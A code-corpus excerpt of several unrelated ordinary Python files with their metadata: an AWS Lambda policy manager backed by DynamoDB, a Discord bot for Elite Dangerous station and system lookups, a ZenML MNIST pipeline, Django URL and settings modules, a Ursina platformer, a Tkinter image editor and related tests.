"call" }, { "api_name": "numpy.random.rand", "line_number": 42, "usage_type": "call" }, { "api_name": "numpy.random", "line_number": 42, "usage_type": "attribute" }, { "api_name": "base64.b64encode", "line_number": 44, "usage_type": "call" }, { "api_name": "time.perf_counter", "line_number": 47, "usage_type": "call" }, { "api_name": "time.sleep", "line_number": 52, "usage_type": "call" }, { "api_name": "logging.getLogger", "line_number": 55, "usage_type": "call" }, { "api_name": "logging.INFO", "line_number": 55, "usage_type": "attribute" }, { "api_name": "logging.info", "line_number": 56, "usage_type": "call" }, { "api_name": "sys.argv", "line_number": 58, "usage_type": "attribute" }, { "api_name": "sys.argv", "line_number": 59, "usage_type": "attribute" }, { "api_name": "time.sleep", "line_number": 62, "usage_type": "call" }, { "api_name": "logging.info", "line_number": 64, "usage_type": "call" } ]
415897232
import boto3 from json import loads, dumps from boto3.dynamodb.conditions import Attr def insert_policy(policy_name, policy_type, data_json): dynamodb = boto3.resource('dynamodb') table = dynamodb.Table("octopus_policy") item = {"PolicyName": policy_name, "Type": policy_type, "Data": dumps(data_json, ensure_ascii=False)} table.put_item( Item=item ) def delete_policy(policy_name, policy_type): dynamodb = boto3.resource('dynamodb') table = dynamodb.Table("octopus_policy") table.delete_item(Key={"PolicyName":policy_name, "Type":policy_type}) def get_policy_by_name(policy_name): dynamodb = boto3.resource('dynamodb') table = dynamodb.Table("octopus_policy") return table.scan(FilterExpression=Attr("PolicyName").eq(policy_name))['Items'] def get_policies_by_type(policy_type): dynamodb = boto3.resource('dynamodb') table = dynamodb.Table("octopus_policy") content = table.scan(FilterExpression=Attr("Type").eq(policy_type))['Items'] list = [] if content: list = [ p['PolicyName'] for p in content] return list def get_all_policies_by_type(policy_type): dynamodb = boto3.resource('dynamodb') table = dynamodb.Table("octopus_policy") return table.scan(FilterExpression=Attr("Type").eq(policy_type))['Items'] def delete_if_not_found(policy_type, object): policy_type = policy_type.upper() # search for all policies of type policies_db = get_all_policies_by_type(policy_type) # we do a comparation to find the item, if not found delete for policy_db in policies_db: found = False for policy in object: if policy_db['Type'] == policy_type: if "Name" in policy and policy_db['PolicyName'] == policy['Name']: found = True break if "role_name" in policy and policy_db['PolicyName'] == policy['role_name']: found = True break if not found: delete_policy(policy_db['PolicyName'],policy_type) def lambda_handler(event,context): print("Debug:",event) if event['httpMethod'] == "GET": if event['resource'] == "/policy/content": policies_db = get_all_policies_by_type("POLICY") trusts_db = get_all_policies_by_type("TRUST") roles_db = get_all_policies_by_type("ROLE") return {"statusCode":200, "body":dumps({"error":False, "policies": dumps(policies_db), "trusts": dumps(trusts_db) , "roles": dumps(roles_db) }), "headers":{ "Content-Type":"application/json", "Access-Control-Allow-Origin":"*"}} elif event['resource'] == "/policy/available/iam": content = get_policies_by_type("IAM") content.sort() return {"statusCode":200, "body":dumps({"error":False, "policies":content}), "headers":{ "Content-Type":"application/json", "Access-Control-Allow-Origin":"*"}} elif event['resource'] == "/policy/available/trust": content = get_policies_by_type("TRUST") content.sort() return {"statusCode":200, "body":dumps({"error":False, "policies":content}), "headers":{ "Content-Type":"application/json", "Access-Control-Allow-Origin":"*"}} elif event['resource'] == "/policy/available/role": content = get_policies_by_type("ROLE") content.sort() return {"statusCode":200, "body":dumps({"error":False, "policies":content}), "headers":{ "Content-Type":"application/json", "Access-Control-Allow-Origin":"*"}} elif event['httpMethod'] == "POST" and event['resource'] == "/policy/update": try: body = loads(event['body']) policies = body['policies'] trusts = body['trusts_relationship'] roles = body['roles'] except KeyError: return {"statusCode":400, "body":dumps({"error":True, "message":"Params invalid"}), "headers":{ "Content-Type":"application/json", "Access-Control-Allow-Origin":"*"}} content = "ok" for policy in policies: policy_name = policy['Name'] policy_type = "POLICY" insert_policy(policy_name, policy_type, policy) for trust in trusts: policy_name = trust['Name'] policy_type = "TRUST" insert_policy(policy_name, policy_type, trust) for role in roles: policy_name = role['role_name'] policy_type = "ROLE" insert_policy(policy_name, policy_type, role) # search for all policies of type POLICY # we do a comparation to find the item, if not found delete delete_if_not_found("POLICY", policies) delete_if_not_found("TRUST" , trusts) delete_if_not_found("ROLE", roles) return {"statusCode":200, "body":dumps({"error":False, "policy":content}), "headers":{ "Content-Type":"application/json", "Access-Control-Allow-Origin":"*"}} return {"statusCode":200, "body":dumps({"error":False, "message":"ok"}), "headers":{ "Content-Type":"application/json", "Access-Control-Allow-Origin":"*"}}
null
src/lambda_manage_policy.py
lambda_manage_policy.py
py
5,374
python
en
code
null
code-starcoder2
83
[ { "api_name": "boto3.resource", "line_number": 6, "usage_type": "call" }, { "api_name": "json.dumps", "line_number": 11, "usage_type": "call" }, { "api_name": "boto3.resource", "line_number": 16, "usage_type": "call" }, { "api_name": "boto3.resource", "line_number": 21, "usage_type": "call" }, { "api_name": "boto3.dynamodb.conditions.Attr", "line_number": 23, "usage_type": "call" }, { "api_name": "boto3.resource", "line_number": 26, "usage_type": "call" }, { "api_name": "boto3.dynamodb.conditions.Attr", "line_number": 28, "usage_type": "call" }, { "api_name": "boto3.resource", "line_number": 35, "usage_type": "call" }, { "api_name": "boto3.dynamodb.conditions.Attr", "line_number": 37, "usage_type": "call" }, { "api_name": "json.dumps", "line_number": 70, "usage_type": "call" }, { "api_name": "json.dumps", "line_number": 71, "usage_type": "call" }, { "api_name": "json.dumps", "line_number": 78, "usage_type": "call" }, { "api_name": "json.dumps", "line_number": 85, "usage_type": "call" }, { "api_name": "json.dumps", "line_number": 92, "usage_type": "call" }, { "api_name": "json.loads", "line_number": 98, "usage_type": "call" }, { "api_name": "json.dumps", "line_number": 103, "usage_type": "call" }, { "api_name": "json.dumps", "line_number": 129, "usage_type": "call" }, { "api_name": "json.dumps", "line_number": 133, "usage_type": "call" } ]
447032432
import os from discord_slash import SlashCommand import discord import keyFinder from discord_slash.utils.manage_commands import create_option import json from urllib.request import Request, urlopen import random import InfoDataValues as IDV try: from dotenv import load_dotenv load_dotenv(dotenv_path = os.path.join(os.path.dirname(__file__), '.env')) except Exception: print("Unable to load dotenv, reverting to system environment variable") # dotenv is a bitch TOKEN = os.getenv("TOKEN") client = discord.Client(intents=discord.Intents.all()) slash = SlashCommand(client, sync_commands=True) # Declares slash commands through the client. @client.event async def on_ready(): print('running bot in') print(os.getcwd()) print('------') print('Logged in as') print(client.user.name) print(client.user.id) print('------') await client.change_presence(activity=discord.Game(name="spansh.co.uk")) @slash.slash( name="findCarrier", description="Finds a station or fleet carrier", options=[ create_option( name="station", description="The carrier to find", option_type=3, required=True ) ] ) async def findCarrier(ctx, station): try: system_name = keyFinder.findKey("station", station, "system_name", "name") # use ID to get system name update_time = keyFinder.findKey("station", station, "updated_at", "name") await ctx.send("Carrier/station " + station + " was last seen in system " + system_name + " at " + update_time ) # send message showing whereabouts of station except Exception as E: if "@" in station: await ctx.send("I'm not falling for that one, " + ctx.message.author.mention) else: await ctx.send("Carrier/station " + station + " could not be found. Bear in mind that carriers must be identified by their code, in the format 'XXX-XXX'. \n \n Reason: " + str(E)) # if there are any errors, show this message along with said error @slash.slash( name="station", description="Shows information about a station or fleet carrier", options=[ create_option( name="station", description="The station to display info about", option_type=3, required=True ) ] ) async def station(ctx, station): try: foundName = keyFinder.findKey("station", station.lower(), "name", "name") pruned_station_data = keyFinder.findKeys("station", station.lower(), IDV.station, "name") formatted_pruned_station_data = [] for key, value in pruned_station_data.items(): formatted_pruned_station_data.append(str(key).replace('id', 'name').replace('_', ' ').capitalize() + ': ' + str(value).capitalize()) # make dictionary look kinda nice and change system id to system name await ctx.send("**" + foundName.upper() + "** \n \n" + '\n'.join(formatted_pruned_station_data)) except Exception as E: if str(E) == 'list index out of range': if "@" in station: await ctx.send("I'm not falling for that one, " + ctx.message.author.mention) else: await ctx.send("Station '" + station + "' does not exist.") else: await ctx.send(str(E) + "\n \n Please contact JoshTheB#1572 if this error persists") @slash.slash( name="system", description="Shows information about a system", options=[ create_option( name="system", description="The system to display info about", option_type=3, required=True ) ] ) async def system(ctx, system): try: foundName = keyFinder.findKey("system", system.lower(), "name", "name") pruned_system_data = keyFinder.findKeys("system", system.lower(), IDV.system, "name") formatted_pruned_system_data = [] for key, value in pruned_system_data.items(): formatted_pruned_system_data.append(str(key).replace('id', 'name').replace('_', ' ').capitalize() + ': ' + str(value).capitalize()) # make dictionary look kinda nice and change system id to system name await ctx.send("**" + foundName.upper() + "** \n \n" + '\n'.join(formatted_pruned_system_data)) except Exception as E: if str(E) == 'list index out of range': if "@" in system: await ctx.send("I'm not falling for that one, " + ctx.message.author.mention) else: await ctx.send("System '" + system + "' does not exist.") else: await ctx.send(str(E) + "\n \n Please contact JoshTheB#1572 if this error persists") @slash.slash( name="body", description="Shows information about a body", options=[ create_option( name="body", description="The body to display info about", option_type=3, required=True ) ] ) async def body(ctx, body): try: foundName = keyFinder.findKey("body", body.lower(), "name", "name") pruned_body_data = keyFinder.findKeys("body", body.lower(), IDV.body, "name") formatted_pruned_body_data = [] for key, value in pruned_body_data.items(): formatted_pruned_body_data.append(str(key).replace('id', 'name').replace('_', ' ').capitalize() + ': ' + str(value).capitalize()) # make dictionary look kinda nice and change body id to body name if not body.upper() == foundName.upper(): await ctx.send("Could not find body " + body + ", instead found") await ctx.send("**" + foundName.upper() + "** \n \n" + '\n'.join(formatted_pruned_body_data)) except Exception as E: if str(E) == 'list index out of range': if "@" in body: await ctx.send("I'm not falling for that one, " + ctx.message.author.mention) else: await ctx.send("Body '" + body + "' does not exist.") else: await ctx.send(str(E) + "\n \n Please contact JoshTheB#1572 if this error persists") client.run(TOKEN)
null
src/main.py
main.py
py
6,268
python
en
code
null
code-starcoder2
83
[ { "api_name": "dotenv.load_dotenv", "line_number": 13, "usage_type": "call" }, { "api_name": "os.path.join", "line_number": 13, "usage_type": "call" }, { "api_name": "os.path", "line_number": 13, "usage_type": "attribute" }, { "api_name": "os.path.dirname", "line_number": 13, "usage_type": "call" }, { "api_name": "os.getenv", "line_number": 16, "usage_type": "call" }, { "api_name": "discord.Client", "line_number": 18, "usage_type": "call" }, { "api_name": "discord.Intents.all", "line_number": 18, "usage_type": "call" }, { "api_name": "discord.Intents", "line_number": 18, "usage_type": "attribute" }, { "api_name": "discord_slash.SlashCommand", "line_number": 19, "usage_type": "call" }, { "api_name": "os.getcwd", "line_number": 24, "usage_type": "call" }, { "api_name": "discord.Game", "line_number": 30, "usage_type": "call" }, { "api_name": "keyFinder.findKey", "line_number": 46, "usage_type": "call" }, { "api_name": "keyFinder.findKey", "line_number": 47, "usage_type": "call" }, { "api_name": "discord_slash.utils.manage_commands.create_option", "line_number": 36, "usage_type": "call" }, { "api_name": "keyFinder.findKey", "line_number": 71, "usage_type": "call" }, { "api_name": "keyFinder.findKeys", "line_number": 72, "usage_type": "call" }, { "api_name": "InfoDataValues.station", "line_number": 72, "usage_type": "attribute" }, { "api_name": "discord_slash.utils.manage_commands.create_option", "line_number": 61, "usage_type": "call" }, { "api_name": "keyFinder.findKey", "line_number": 105, "usage_type": "call" }, { "api_name": "keyFinder.findKeys", "line_number": 106, "usage_type": "call" }, { "api_name": "InfoDataValues.system", "line_number": 106, "usage_type": "attribute" }, { "api_name": "discord_slash.utils.manage_commands.create_option", "line_number": 95, "usage_type": "call" }, { "api_name": "keyFinder.findKey", "line_number": 138, "usage_type": "call" }, { "api_name": "keyFinder.findKeys", "line_number": 139, "usage_type": "call" }, { "api_name": "InfoDataValues.body", "line_number": 139, "usage_type": "attribute" }, { "api_name": "discord_slash.utils.manage_commands.create_option", "line_number": 128, "usage_type": "call" } ]
239913287
from django.conf.urls import url from .views import * urlpatterns = [ url(r'^profiles/$', index_view), url(r'^login/$',login_view,name='login'), url(r'^logout/$',logout_view,name='logout'), url(r'^profiles/$',profiles_view,name='profiles'), url(r'^my_profile/$',my_profile_view,name='my_profile'), url(r'^register/$',register_view,name='register'), url(r'^see/(?P<id_user>.*)/$',see_profile_view,name='see'), ]
null
users/urls.py
urls.py
py
422
python
en
code
null
code-starcoder2
83
[ { "api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call" }, { "api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call" }, { "api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call" }, { "api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call" }, { "api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call" }, { "api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call" }, { "api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call" } ]
44090576
from ursina import * from ursina.prefabs.platformer_controller_2d import PlatformerController2d app = Ursina() window.title = 'Platformer' window.color = color.gold window.fullscreen = True player = PlatformerController2d( position = (-8, 0), collider = 'box', collision = True, color = color.white, texture='brick' ) camera.add_script(SmoothFollow(target=player, offset=[0.5, -30], speed=40)) def update(): player.x += held_keys['d'] * time.dt * 2 player.x -= held_keys['a'] * time.dt * 2 def input(key): if key == 'enter': player.position = (0, -1) """ def draw_world(x = 0, y = 0, columns = 0): def draw_column(height = 5): for i in range(height + 1): tile = Entity( position(x, y) model = "quad", collider = 'box', scale = (1, 1, 1), collision = True, ) draw_world() """ counter_2 = -10 for i in range(10): counter_1 = -11 for i in range(5): tile = Entity( model = "quad", collider = "box", collision = True, x = counter_2, y = counter_1, ) counter_1 += 1 counter_2 += 1 app.run()
null
urs/main.py
main.py
py
1,318
python
en
code
null
code-starcoder2
83
[ { "api_name": "ursina.prefabs.platformer_controller_2d.PlatformerController2d", "line_number": 10, "usage_type": "call" } ]
129547043
import tkinter from tkinter import * from PIL import Image, ImageTk, ImageEnhance def setupCanvas(imageName): "Create canvas and load provided image" try: global im im = Image.open(imageName) canvas.image = ImageTk.PhotoImage(im) canvas.create_image(0, 0, image=canvas.image, anchor="nw") except: print("Image could not be loaded") def setupButtons(): "Create image processing scales and add to window" brightnessScale = Scale(root, label="Brightness", orient=HORIZONTAL, from_=0.0, to= 3.0, length = 200, resolution=0.01, command = brightenImage) brightnessScale.set(1.0) brightnessScale.pack() def promptUser(): "Asks user for name of image located in same directory as program" imageName = input("Please input the name of your image: ") return imageName #image processing functions def brightenImage(val): enhancer = ImageEnhance.Brightness(im) canvas.image.paste(enhancer.enhance(float(val))) #imageName = promptUser() root = Tk() root.title("Image Editor") #create canvas canvas = Canvas(root, width=1920, height=1080) canvas.pack() #load image, create pixel map and add GUI elements setupCanvas("wallpaper.jpg") setupButtons() #start application root.mainloop()
null
ImageEditor.py
ImageEditor.py
py
1,202
python
en
code
null
code-starcoder2
83
[ { "api_name": "PIL.Image.open", "line_number": 9, "usage_type": "call" }, { "api_name": "PIL.Image", "line_number": 9, "usage_type": "name" }, { "api_name": "PIL.ImageTk.PhotoImage", "line_number": 11, "usage_type": "call" }, { "api_name": "PIL.ImageTk", "line_number": 11, "usage_type": "name" }, { "api_name": "PIL.ImageEnhance.Brightness", "line_number": 31, "usage_type": "call" }, { "api_name": "PIL.ImageEnhance", "line_number": 31, "usage_type": "name" } ]
383830323
# Copyright (c) ZenML GmbH 2021. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at: # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express # or implied. See the License for the specific language governing # permissions and limitations under the License. import numpy as np import tensorflow as tf from sklearn.base import ClassifierMixin from sklearn.linear_model import LogisticRegression from zenml.core.repo import Repository from zenml.pipelines import pipeline from zenml.steps import step from zenml.steps.base_step_config import BaseStepConfig from zenml.steps.step_output import Output class TrainerConfig(BaseStepConfig): """Trainer params""" epochs: int = 1 gamma: float = 0.7 lr: float = 0.001 @step def importer_mnist() -> Output( X_train=np.ndarray, y_train=np.ndarray, X_test=np.ndarray, y_test=np.ndarray ): """Download the MNIST data store it as an artifact""" (X_train, y_train), ( X_test, y_test, ) = tf.keras.datasets.mnist.load_data() return X_train, y_train, X_test, y_test @step def normalize_mnist( X_train: np.ndarray, X_test: np.ndarray ) -> Output(X_train_normed=np.ndarray, X_test_normed=np.ndarray): """Normalize the values for all the images so they are between 0 and 1""" X_train_normed = X_train / 255.0 X_test_normed = X_test / 255.0 return X_train_normed, X_test_normed @step def tf_trainer( config: TrainerConfig, X_train: np.ndarray, y_train: np.ndarray, ) -> tf.keras.Model: """Train a neural net from scratch to recognise MNIST digits return our model or the learner""" model = tf.keras.Sequential( [ tf.keras.layers.Flatten(input_shape=(28, 28)), tf.keras.layers.Dense(10, activation="relu"), tf.keras.layers.Dense(10), ] ) model.compile( optimizer=tf.keras.optimizers.Adam(0.001), loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), metrics=["accuracy"], ) model.fit( X_train, y_train, epochs=config.epochs, ) # write model return model @step def tf_evaluator( X_test: np.ndarray, y_test: np.ndarray, model: tf.keras.Model, ) -> float: """Calculate the loss for the model for each epoch in a graph""" _, test_acc = model.evaluate(X_test, y_test, verbose=2) return test_acc @step def sklearn_trainer( config: TrainerConfig, X_train: np.ndarray, y_train: np.ndarray, ) -> ClassifierMixin: """Train SVC from sklearn.""" clf = LogisticRegression(penalty="l1", solver="saga", tol=0.1) clf.fit(X_train.reshape((X_train.shape[0], -1)), y_train) return clf @step def sklearn_evaluator( X_test: np.ndarray, y_test: np.ndarray, model: ClassifierMixin, ) -> float: """Calculate accuracy score with classifier.""" test_acc = model.score(X_test.reshape((X_test.shape[0], -1)), y_test) return test_acc @pipeline def mnist_pipeline( importer, normalizer, trainer, evaluator, ): # Link all the steps artifacts together X_train, y_train, X_test, y_test = importer() X_trained_normed, X_test_normed = normalizer(X_train=X_train, X_test=X_test) model = trainer(X_train=X_trained_normed, y_train=y_train) evaluator(X_test=X_test_normed, y_test=y_test, model=model) # Run the pipeline # Initialise a pipeline run tf_p = mnist_pipeline( importer=importer_mnist(), normalizer=normalize_mnist(), trainer=tf_trainer(config=TrainerConfig(epochs=1)), evaluator=tf_evaluator(), ) # Run the pipeline tf_p.run() # Initialise a new pipeline run scikit_p = mnist_pipeline( importer=importer_mnist(), normalizer=normalize_mnist(), trainer=sklearn_trainer(config=TrainerConfig()), evaluator=sklearn_evaluator(), ) # Run the new pipeline scikit_p.run() # Post execution flow repo = Repository() p = repo.get_pipeline(pipeline_name="mnist_pipeline") print(f"Pipeline `mnist_pipeline` has {len(p.runs)} run(s)") for r in p.runs[0:2]: eval_step = r.steps[3] print( f"For {eval_step.name}, the accuracy is: " f"{eval_step.output.read():.2f}" )
null
examples/low_level_guide/chapter_4.py
chapter_4.py
py
4,547
python
en
code
null
code-starcoder2
83
[ { "api_name": "zenml.steps.base_step_config.BaseStepConfig", "line_number": 27, "usage_type": "name" }, { "api_name": "tensorflow.keras.datasets.mnist.load_data", "line_number": 43, "usage_type": "call" }, { "api_name": "tensorflow.keras", "line_number": 43, "usage_type": "attribute" }, { "api_name": "zenml.steps.step", "line_number": 35, "usage_type": "name" }, { "api_name": "zenml.steps.step_output.Output", "line_number": 36, "usage_type": "call" }, { "api_name": "numpy.ndarray", "line_number": 37, "usage_type": "attribute" }, { "api_name": "numpy.ndarray", "line_number": 49, "usage_type": "attribute" }, { "api_name": "zenml.steps.step", "line_number": 47, "usage_type": "name" }, { "api_name": "zenml.steps.step_output.Output", "line_number": 50, "usage_type": "call" }, { "api_name": "numpy.ndarray", "line_number": 50, "usage_type": "attribute" }, { "api_name": "numpy.ndarray", "line_number": 60, "usage_type": "attribute" }, { "api_name": "numpy.ndarray", "line_number": 61, "usage_type": "attribute" }, { "api_name": "tensorflow.keras.Sequential", "line_number": 65, "usage_type": "call" }, { "api_name": "tensorflow.keras", "line_number": 65, "usage_type": "attribute" }, { "api_name": "tensorflow.keras.layers.Flatten", "line_number": 67, "usage_type": "call" }, { "api_name": "tensorflow.keras", "line_number": 67, "usage_type": "attribute" }, { "api_name": "tensorflow.keras.layers.Dense", "line_number": 68, "usage_type": "call" }, { "api_name": "tensorflow.keras", "line_number": 68, "usage_type": "attribute" }, { "api_name": "tensorflow.keras.layers.Dense", "line_number": 69, "usage_type": "call" }, { "api_name": "tensorflow.keras", "line_number": 69, "usage_type": "attribute" }, { "api_name": "tensorflow.keras.optimizers.Adam", "line_number": 74, "usage_type": "call" }, { "api_name": "tensorflow.keras", "line_number": 74, "usage_type": "attribute" }, { "api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 75, "usage_type": "call" }, { "api_name": "tensorflow.keras", "line_number": 75, "usage_type": "attribute" }, { "api_name": "zenml.steps.step", "line_number": 57, "usage_type": "name" }, { "api_name": "tensorflow.keras", "line_number": 62, "usage_type": "attribute" }, { "api_name": "numpy.ndarray", "line_number": 91, "usage_type": "attribute" }, { "api_name": "numpy.ndarray", "line_number": 92, "usage_type": "attribute" }, { "api_name": "tensorflow.keras", "line_number": 93, "usage_type": "attribute" }, { "api_name": "zenml.steps.step", "line_number": 89, "usage_type": "name" }, { "api_name": "numpy.ndarray", "line_number": 104, "usage_type": "attribute" }, { "api_name": "numpy.ndarray", "line_number": 105, "usage_type": "attribute" }, { "api_name": "sklearn.linear_model.LogisticRegression", "line_number": 108, "usage_type": "call" }, { "api_name": "zenml.steps.step", "line_number": 101, "usage_type": "name" }, { "api_name": "sklearn.base.ClassifierMixin", "line_number": 106, "usage_type": "name" }, { "api_name": "numpy.ndarray", "line_number": 115, "usage_type": "attribute" }, { "api_name": "numpy.ndarray", "line_number": 116, "usage_type": "attribute" }, { "api_name": "sklearn.base.ClassifierMixin", "line_number": 117, "usage_type": "name" }, { "api_name": "zenml.steps.step", "line_number": 113, "usage_type": "name" }, { "api_name": "zenml.pipelines.pipeline", "line_number": 125, "usage_type": "name" }, { "api_name": "zenml.core.repo.Repository", "line_number": 164, "usage_type": "call" } ]
117864208
from nose.tools import set_trace, eq_ from . import DatabaseTest from scripts import RedoOCLCForThreeMScript from core.model import ( Identifier, DataSource, CoverageRecord, ) class DummyCoverageProvider(object): hit_count = 0 def ensure_coverage(self, identifier): self.hit_count += 1 class TestRedoOCLCForThreeM(DatabaseTest): def setup(self): super(TestRedoOCLCForThreeM, self).setup() self.script = RedoOCLCForThreeMScript(self._db) self.edition1, lp = self._edition( data_source_name = DataSource.THREEM, identifier_type = Identifier.THREEM_ID, with_license_pool = True, title = "Metropolis" ) self.edition2, lp = self._edition( data_source_name = DataSource.THREEM, identifier_type = Identifier.THREEM_ID, with_license_pool = True, title = "The ArchAndroid" ) # Give edition2 a coverage record. self._coverage_record(self.edition2, self.script.input_data_source) # Create a control case. self.edition3, lp = self._edition( data_source_name = DataSource.THREEM, identifier_type = Identifier.THREEM_ID, with_license_pool = True, title = "The Electric Lady" ) self._db.commit() # Remove contributors for the first two editions. contributions = list(self.edition1.contributions) + list(self.edition2.contributions) contributors = list(self.edition1.contributors) + list(self.edition2.contributors) for c in contributions + contributions: self._db.delete(c) self._db.commit() def test_fetch_authorless_threem_identifiers(self): identifiers = self.script.fetch_authorless_threem_identifiers() # Both the editions with and without coverage records are selected... eq_(2, len(identifiers)) # ...while the edition with contributors is not. assert self.edition3.primary_identifier not in identifiers def test_delete_coverage_records(self): oclc = DataSource.lookup(self._db, DataSource.OCLC_LINKED_DATA) q = self._db.query(CoverageRecord).filter( CoverageRecord.data_source==oclc ) coverage_records_before = q.all() eq_(1, len(coverage_records_before)) eq_(self.edition2.primary_identifier, coverage_records_before[0].identifier) identifiers = [self.edition1.primary_identifier, self.edition2.primary_identifier] self.script.delete_coverage_records(identifiers) coverage_records_after = q.all() eq_(0, len(coverage_records_after)) def test_ensure_isbn_identifier(self): self.script.oclc_classify = DummyCoverageProvider() eq_(0, self.script.oclc_classify.hit_count) # When there are no equivalent identifiers, both identifiers go to the # OCLCClassify coverage provider. identifiers = [self.edition1.primary_identifier, self.edition2.primary_identifier] self.script.ensure_isbn_identifier(identifiers) eq_(2, self.script.oclc_classify.hit_count) # If an edition already has an ISBN identifier it doesn't go to the # coverage provider. self.script.oclc_classify.hit_count = 0 self.edition1.primary_identifier.equivalent_to( DataSource.lookup(self._db, DataSource.GUTENBERG), self._identifier(identifier_type = Identifier.ISBN), 1 ) self._db.commit() self.script.ensure_isbn_identifier(identifiers) eq_(1, self.script.oclc_classify.hit_count) def test_merge_contributors(self): oclc_work = self._identifier(identifier_type=Identifier.OCLC_WORK) oclc_number = self._identifier(identifier_type=Identifier.OCLC_NUMBER) denzel, ignore = self._contributor("Denzel Washington") for oclc_id in [oclc_work, oclc_number]: # Create editions for each OCLC Identifier, give them a contributor, # and set them equivalent. edition = self._edition( data_source_name = self.script.input_data_source.name, identifier_type = oclc_id.type, identifier_id = oclc_id.identifier, title = "King Kong Ain't Got Nothin On Me" ) [contribution] = edition.contributions contribution.contributor = denzel self.edition1.primary_identifier.equivalent_to( self.script.input_data_source, oclc_id, 1 ) self._db.commit() eq_(0, len(self.edition1.contributors)) self.script.merge_contributors(self.edition1.primary_identifier) eq_(1, len(self.edition1.contributors)) eq_( ["Washington, Denzel"], [x.sort_name for x in self.edition1.contributors] )
null
tests/test_scripts.py
test_scripts.py
py
4,922
python
en
code
null
code-starcoder2
83
[ { "api_name": "scripts.RedoOCLCForThreeMScript", "line_number": 20, "usage_type": "call" }, { "api_name": "core.model.DataSource.THREEM", "line_number": 23, "usage_type": "attribute" }, { "api_name": "core.model.DataSource", "line_number": 23, "usage_type": "name" }, { "api_name": "core.model.Identifier.THREEM_ID", "line_number": 24, "usage_type": "attribute" }, { "api_name": "core.model.Identifier", "line_number": 24, "usage_type": "name" }, { "api_name": "core.model.DataSource.THREEM", "line_number": 30, "usage_type": "attribute" }, { "api_name": "core.model.DataSource", "line_number": 30, "usage_type": "name" }, { "api_name": "core.model.Identifier.THREEM_ID", "line_number": 31, "usage_type": "attribute" }, { "api_name": "core.model.Identifier", "line_number": 31, "usage_type": "name" }, { "api_name": "core.model.DataSource.THREEM", "line_number": 40, "usage_type": "attribute" }, { "api_name": "core.model.DataSource", "line_number": 40, "usage_type": "name" }, { "api_name": "core.model.Identifier.THREEM_ID", "line_number": 41, "usage_type": "attribute" }, { "api_name": "core.model.Identifier", "line_number": 41, "usage_type": "name" }, { "api_name": "nose.tools.eq_", "line_number": 58, "usage_type": "call" }, { "api_name": "core.model.DataSource.lookup", "line_number": 63, "usage_type": "call" }, { "api_name": "core.model.DataSource", "line_number": 63, "usage_type": "name" }, { "api_name": "core.model.DataSource.OCLC_LINKED_DATA", "line_number": 63, "usage_type": "attribute" }, { "api_name": "core.model.CoverageRecord", "line_number": 64, "usage_type": "argument" }, { "api_name": "core.model.CoverageRecord.data_source", "line_number": 65, "usage_type": "attribute" }, { "api_name": "core.model.CoverageRecord", "line_number": 65, "usage_type": "name" }, { "api_name": "nose.tools.eq_", "line_number": 68, "usage_type": "call" }, { "api_name": "nose.tools.eq_", "line_number": 69, "usage_type": "call" }, { "api_name": "nose.tools.eq_", "line_number": 74, "usage_type": "call" }, { "api_name": "nose.tools.eq_", "line_number": 78, "usage_type": "call" }, { "api_name": "nose.tools.eq_", "line_number": 84, "usage_type": "call" }, { "api_name": "core.model.DataSource.lookup", "line_number": 90, "usage_type": "call" }, { "api_name": "core.model.DataSource", "line_number": 90, "usage_type": "name" }, { "api_name": "core.model.DataSource.GUTENBERG", "line_number": 90, "usage_type": "attribute" }, { "api_name": "core.model.Identifier.ISBN", "line_number": 91, "usage_type": "attribute" }, { "api_name": "core.model.Identifier", "line_number": 91, "usage_type": "name" }, { "api_name": "nose.tools.eq_", "line_number": 95, "usage_type": "call" }, { "api_name": "core.model.Identifier.OCLC_WORK", "line_number": 98, "usage_type": "attribute" }, { "api_name": "core.model.Identifier", "line_number": 98, "usage_type": "name" }, { "api_name": "core.model.Identifier.OCLC_NUMBER", "line_number": 99, "usage_type": "attribute" }, { "api_name": "core.model.Identifier", "line_number": 99, "usage_type": "name" }, { "api_name": "nose.tools.eq_", "line_number": 116, "usage_type": "call" }, { "api_name": "nose.tools.eq_", "line_number": 118, "usage_type": "call" }, { "api_name": "nose.tools.eq_", "line_number": 119, "usage_type": "call" } ]
10281447
# flake8: noqa from os import environ from django.core.exceptions import ImproperlyConfigured from bananas.url import database_conf_from_url from .base import * DATABASES = { 'default': database_conf_from_url(environ.get('DATABASE_URI')) } WWW_ROOT = environ.get('WWW_ROOT') if not WWW_ROOT: raise ImproperlyConfigured('WWW_ROOT is falsey, ' 'can\'t continue in a safe manner') STATIC_ROOT = os.path.join( WWW_ROOT, 'static' ) MEDIA_ROOT = os.path.join( WWW_ROOT, 'media' ) PUBLISH = { 'redis': { 'host': environ.get('REDIS_HOST', 'localhost') } } ELASTICSEARCH = { 'hosts': [ {'host': environ.get('ELASTICSEARCH_HOST', 'localhost')} ] }
null
src/trak/settings/live.py
live.py
py
734
python
en
code
null
code-starcoder2
83
